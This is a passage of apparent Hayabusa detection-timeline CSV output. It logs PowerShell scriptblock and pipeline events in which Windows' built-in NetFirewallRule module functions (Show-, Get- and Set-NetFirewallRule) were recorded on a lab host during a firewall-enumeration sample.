$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 